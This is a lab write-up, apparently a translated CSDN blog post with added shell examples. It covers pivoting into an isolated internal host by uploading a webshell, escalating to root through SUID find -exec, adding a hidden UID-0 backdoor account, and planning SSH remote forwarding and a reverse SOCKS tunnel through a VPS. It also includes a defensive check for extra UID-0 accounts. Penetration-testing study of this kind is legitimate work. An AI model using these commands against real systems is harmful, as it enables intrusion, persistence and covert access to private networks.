Intranet proxy and forwarding

Isolated internal target: 192.168.179.200
This target cannot be reached directly. It has to be accessed through the web server, which is dual-homed (two network cards): external IP 192.168.43.100, internal IP 192.168.179.100.
First visit the external IP and upload a webshell; this gives us the privileges of the account the web daemon runs as. The upload succeeds:
Connect to the webshell with Behinder (冰蝎):

Now we need to escalate to root, and here we use SUID privilege escalation. A file with the SUID bit set runs with the effective UID of its owner rather than that of the user who launched it; when the owner is root, whatever that program can be made to execute runs as root.
Use find / -perm -u=s -type f 2>/dev/null to list the programs with the SUID bit set (this walks the whole filesystem, so it takes a while):

Look in that list for a program that can be abused to escalate privileges. Common candidates:
nmap
vim
find
bash
more
less
nano
cp

find is present on this host, so we use it. Enter /tmp, create a new file, and run a command through find's -exec. The terminator must be escaped as \; (written as a bare ; the shell treats it as a command separator and find complains about a missing -exec argument):
touch abcd
find abcd -exec whoami \;
The command runs as root, so we temporarily have root privileges. For an interactive root shell, launch a shell the same way, e.g. find abcd -exec /bin/bash -p \; (bash drops the effective UID without -p):
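The SUID triage and the find -exec step above, as an added example that is not code from the original post. The list of abusable names is the one the post gives; the sample paths at the bottom are constructed so the script runs offline, and the live search is left as a function to call on the target.

```shell
#!/bin/bash
# Added example, not from the original post: triage a SUID list for the binaries
# the post names, and run a command through find's -exec with the correct terminator.

# Binaries the post lists as usable for SUID privilege escalation.
ABUSABLE="nmap vim find bash more less nano cp"

# Live enumeration: the post's search, narrowed to root-owned files, because a
# SUID bit only grants the owner's privileges.
list_suid_root() {
    find / -perm -4000 -user root -type f 2>/dev/null
}

# Read one path per line on stdin and print those whose basename is in ABUSABLE.
triage_suid() {
    local path name a
    while IFS= read -r path; do
        name=${path##*/}
        for a in $ABUSABLE; do
            if [ "$name" = "$a" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# Run a command through find's -exec. The terminator must reach find as a literal
# ';' argument: typed unescaped ("find abcd -exec whoami;") the shell consumes the
# ';' as a command separator and find fails with "missing argument to -exec".
# With a SUID-root find, e.g. suid_find_exec /usr/bin/find /bin/bash -p, the
# command runs as root (-p stops bash from dropping the effective UID).
suid_find_exec() {
    local findbin=$1
    shift
    "$findbin" . -maxdepth 0 -exec "$@" \;
}

# Offline demo on a constructed list; on the target run: list_suid_root | triage_suid
printf '%s\n' /usr/bin/find /usr/bin/passwd /usr/bin/nmap /usr/bin/sudo | triage_suid
```

Only the root-owned SUID files matter for this escalation; a SUID binary owned by an unprivileged user only ever gets that user's rights.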

For convenience, create an account, ideally one with root privileges. Setting the UID to 0 makes the new account equivalent to root (-o permits the duplicate UID). The password hash comes from openssl passwd, so it has to be supplied through a quoted command substitution; run as root (from the shell obtained through find):
useradd -p "$(openssl passwd -1 -salt 'masters' 123456)" -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/masters masters
The account is created successfully:
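The account-creation step, as an added example rather than the post's own code: the useradd line with the command substitution made explicit, plus the check a defender (or a later tester) runs to spot extra UID-0 accounts, which is exactly what this backdoor looks like in /etc/passwd. The passwd excerpt is constructed; the username, password and salt are the post's.

```shell
#!/bin/bash
# Added example, not from the original post: build the post's useradd command and
# detect the resulting duplicate-UID-0 account. SAMPLE_PASSWD is constructed.

# Build the post's useradd command. openssl passwd -1 prints an MD5-crypt hash
# ($1$<salt>$...), which useradd -p stores verbatim in /etc/shadow; -u 0 -o gives
# the account root's UID and allows the duplicate. The printed command must be
# run as root. Arguments: username password salt
build_useradd_cmd() {
    local user=$1 pass=$2 salt=$3 hash
    hash=$(openssl passwd -1 -salt "$salt" "$pass") || return 1
    printf "useradd -p '%s' -u 0 -o -g root -G root -s /bin/bash -d /usr/bin/%s %s\n" \
        "$hash" "$user" "$user"
}

# Detection side: print accounts other than root whose UID is 0, reading
# passwd(5) lines on stdin. On a live host: find_uid0_accounts < /etc/passwd
find_uid0_accounts() {
    awk -F: '$3 == 0 && $1 != "root" { print $1 }'
}

# Constructed /etc/passwd excerpt showing the account the post creates.
SAMPLE_PASSWD='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
masters:x:0:0::/usr/bin:/bin/bash'

printf '%s\n' "$SAMPLE_PASSWD" | find_uid0_accounts
```

Note that -d /usr/bin/masters is the home directory the post chose; it is unusual, and a directory under /usr/bin is itself a tell for anyone reviewing the box.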

Now that we have root on the dual-homed web server, the internal target can be reached from it:

The next step is to establish an SSH tunnel, which is port forwarding over SSH. A VPS is used here. Since the web server can reach the VPS but the VPS cannot initiate connections into the lab's private addresses, the natural choice is remote forwarding: the web server opens an SSH connection to the VPS, a listening port is bound on the VPS, and traffic arriving on that port is carried back through the tunnel to the internal target. The specifics have not been implemented yet and will be added in a later update; this post is kept as a learning record, and corrections are welcome.
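The tunnel the post describes but has not yet implemented, as an added example that is not the author's code. The VPS login tunnel@vps.example.com, the VPS listen port 2222 and the SOCKS port 1080 are assumptions; the internal target 192.168.179.200 is the post's. Key-based login from the web server to the VPS is assumed so the connection can run in the background.

```shell
#!/bin/bash
# Added example, not from the original post: SSH remote forwarding through a VPS,
# plus the sshd_config check that decides whether the VPS-side listener is reachable.
# Assumed names: tunnel@vps.example.com, ports 2222 and 1080.

# Remote forward, run on the dual-homed web server: it dials out to the VPS, sshd
# on the VPS listens on listen_port, and every connection to that port is carried
# back through the tunnel to target:target_port on the internal network.
# Arguments: vps_user vps_host listen_port target target_port
build_remote_forward() {
    printf 'ssh -fN -R 0.0.0.0:%s:%s:%s %s@%s\n' "$3" "$4" "$5" "$1" "$2"
}

# Reverse dynamic forward (OpenSSH 7.6 and later): a SOCKS proxy on the VPS whose
# connections exit from the web server, so any internal host becomes reachable,
# e.g. curl --socks5 127.0.0.1:1080 http://192.168.179.200/ run on the VPS.
# Arguments: vps_user vps_host socks_port
build_reverse_socks() {
    printf 'ssh -fN -R %s %s@%s\n' "$3" "$1" "$2"
}

# A 0.0.0.0 bind on the VPS only takes effect if its sshd_config has
# "GatewayPorts yes" (or clientspecified); otherwise sshd silently binds 127.0.0.1
# and the port is usable only from the VPS itself. sshd honours the first
# occurrence of a directive, so later duplicates are ignored. Reads sshd_config
# text on stdin (Match blocks are not handled); exits 0 if non-loopback binds are allowed.
gateway_ports_enabled() {
    awk '
        /^[[:space:]]*#/ { next }
        tolower($1) == "gatewayports" && v == "" { v = tolower($2) }
        END { exit !(v == "yes" || v == "clientspecified") }
    '
}

# Commands for the lab in the post (printed, not executed):
build_remote_forward tunnel vps.example.com 2222 192.168.179.200 22
build_reverse_socks tunnel vps.example.com 1080
```

With GatewayPorts left at its default of no, the first command still works, but the attacker then has to SSH into the VPS and connect to 127.0.0.1:2222 from there rather than to the VPS's public address.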

Origin blog.csdn.net/qq_38989921/article/details/114162099